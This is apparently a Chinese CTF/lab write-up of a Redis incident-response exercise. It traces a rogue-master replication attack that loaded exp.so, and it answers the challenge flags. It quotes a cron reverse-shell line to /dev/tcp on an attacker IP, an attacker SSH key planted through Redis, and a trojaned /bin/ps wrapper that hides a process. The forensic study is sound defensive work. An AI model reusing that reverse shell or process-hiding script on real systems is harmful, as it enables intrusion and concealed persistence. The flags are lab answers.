第二章日志分析-redis应急响应-玄机靶场

redis应急响应-靶场笔记

题目汇总

通过本地 PC SSH到服务器并且分析黑客攻击成功的 IP 为多少,将黑客 IP 作为 FLAG 提交;

通过本地 PC SSH到服务器并且分析黑客第一次上传的恶意文件,将黑客上传的恶意文件里面的 FLAG 提交;

通过本地 PC SSH到服务器并且分析黑客反弹 shell 的IP 为多少,将反弹 shell 的IP 作为 FLAG 提交;

通过本地 PC SSH到服务器并且溯源分析黑客的用户名，并且找到黑客使用的工具里的关键字符串(flag{黑客的用户-关键字符串} 注关键字符串 xxx-xxx-xxx)。将用户名和关键字符串作为 FLAG提交

通过本地 PC SSH到服务器并且分析黑客篡改的命令,将黑客篡改的命令里面的关键字符串作为 FLAG 提交;

通过本地 PC SSH到服务器并且分析黑客攻击成功的 IP 为多少

分析/var/log/redis.log日志，发现链接上 192.168.100.20 后黑客进行了主从复制操作（MASTER <-> REPLICA同步）。并上传加载了恶意模块“exp.so”

419:S 31 Jul 2023 05:34:35.197 # Failed trying to load the MASTER synchronization DB from disk
419:S 31 Jul 2023 05:34:35.791 * Connecting to MASTER 192.168.100.20:8888
419:S 31 Jul 2023 05:34:35.791 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:34:35.792 * Non blocking connect for SYNC fired the event.
419:S 31 Jul 2023 05:34:37.205 * Module 'system' loaded from ./exp.so
419:M 31 Jul 2023 05:34:37.210 # Setting secondary replication ID to 7a73a1a4297a16c50d8465b0cc432444f0e5df71, valid up to offset: 1. New replication ID is 46e68f9593cd148bffe464f0b04bee19ac447c39

所以得到flag{192.168.100.20}

通过本地 PC SSH到服务器并且分析黑客第一次上传的恶意文件

由一题的思路我们可以得知黑客第一次上传的恶意文件就是“exp.so”

strings /exp.so | grep "flag"读取得到flag

root@ip-10-0-10-2:~# strings  /exp.so | grep "flag"
flag{XJ_78f012d7-42fc-49a8-8a8c-e74c87ea109b}
_flags2
_flags

通过本地 PC SSH到服务器并且分析黑客反弹 shell 的IP 为多少

在分析/var/log/redis.log日志，发现一段奇怪的链接。

Jul 2023 05:33:50.693 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:51.694 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:51.694 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:51.695 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:52.696 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:52.696 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:52.697 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:53.698 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:53.698 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:53.699 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:54.700 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:54.700 * MASTER <-> REPLICA sync started

分析下了疑似攻击者想反弹链接192.168.100.13:8888，推断192.168.100.13为攻击者IP。

同时在crontab -l中发现反弹shell，目的IP同样为192.168.100.13

root@ip-10-0-10-2:~# crontab -l
# Edit this file to introduce tasks to be run by cron.
# 
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
# 
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').
# 
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
# 
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
# 
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
# 
# For more information see the manual pages of crontab(5) and cron(8)
# 
*/1 * * * *  /bin/sh -i >& /dev/tcp/192.168.100.13/7777 0>&1
# m h  dom mon dow   command
root@ip-10-0-10-2:~#

通过本地 PC SSH到服务器并且溯源分析黑客的用户名，并且找到黑客使用的工具里的关键字符串

检查ssh密钥时发现疑似用户名：xj-test-user

root@ip-10-0-10-2:~# cat  .ssh/authorized_keys 
REDIS0009�      redis-ver5.0.1�
�edis-bits�@�ctime�tO�dused-mem�XU
 aof-preamble���xxsshB9

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDDh4OEFvyb4ubM7YPvzG/FfO6jE4PjLdmuCUdGP+aeLeJB5SXYT6zHkU9wlfY/Fo4UuBlhTqBaS6Ih/Wf62KepzrMsTQQYcSG/Xp8lgFzVCCFAk7apzxfRCPNk1pxaGiEF6MPoCmUu1UhC3ta3xyh2c4KZls0hyFN9JZsuD+siT8KVqm856vQ+RaTrZi3ThMa5gbeH+v3ZUcO35ZfMKor/uWXffHT0Yi06dsgIMN3faIiBrd1Lg0B5kOTaDq3fHs8Qs7pvR9C4ZTm2AK/Oct8ULdsnfS2YWtrYyC8rzNip9Wf083ZY1B4bj1UoxD+QwgThh5VP3xgRd9KDSzEYIBabstGh8GU5zDxr0zIuhQM35I0aALvojXl4QaaEnZwpqU3ZkojPG2aNC0QdiBK7eKwA38Gk+V8DEWc/TTkO+wm3aXYdll5sPmoWTAonaln1nmCiTDn4jKb73DxYHfSgNIDpJ6fS5kbWL5UJnElWCrxzaXKHUlqXJj3x81Oz6baFNv8= xj-test-user

在github查询发现xj-test-user有个与项目相关的项目。

寻找发现项目本身没有flag,一番查找后发现历史记录

发现在typ提交下，网址：https://github.com/xj-test-user/redis-rogue-getshell/commit/76b1b74b92f9cc6ef2a62985debdf09dcc056636，发现在文件中内置：wow-you-find-flag flag{xj-test-user-wow-you-find-flag}

通过本地 PC SSH到服务器并且分析黑客篡改的命令,将黑客篡改的命令里面的关键字符串作为 FLAG 提交;

用ls -alt /bin/ 查看最近变动的命令。

root@ip-10-0-10-2:~# ls -alt /bin/
total 197540
drwxr-xr-x  2 root root       36864 Aug  1  2023  .
-rwxrwxrwx  1 root root         178 Jul 31  2023  ps
-rwxr-xr-x  1 root root      133432 Jul 31  2023  ps_
lrwxrwxrwx  1 root root          25 Jul 31  2023  aclocal -> /etc/alternatives/aclocal
lrwxrwxrwx  1 root root          26 Jul 31  2023  automake -> /etc/alternatives/automake
lrwxrwxrwx  1 root root          21 Jul 31  2023  c99 -> /etc/alternatives/c99

发现ps 大小和时间很可疑，读取发现flag

root@ip-10-0-10-2:~# cat /bin/ps
#/bin/bash
oldifs="$IFS"
IFS='\$n'
result=$(ps_ $1 $2 $3|grep -v 'threadd' )
for v in $result;
do
        echo -e "$v\t";
done
IFS="$oldifs"
#//c195i2923381905517d818e313792d196